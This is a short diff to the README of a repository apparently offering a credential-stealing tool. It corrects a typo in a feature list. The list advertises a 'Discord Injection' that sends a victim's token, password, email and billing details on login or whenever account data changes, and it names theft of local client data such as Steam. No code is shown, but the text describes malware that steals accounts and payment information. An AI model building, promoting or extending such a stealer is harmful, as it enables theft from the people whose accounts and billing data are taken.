metaversnova/AstraLink-Professional/README.md

     -   Links In Gifts inventory

 -   Discord Injection
-    - Sends token, password, email and billing on login or when the account's data get's modified
+    - Sends token, password, email and billing on login or when the account's data gets modified

 -   Local Client's Data
     -   Steam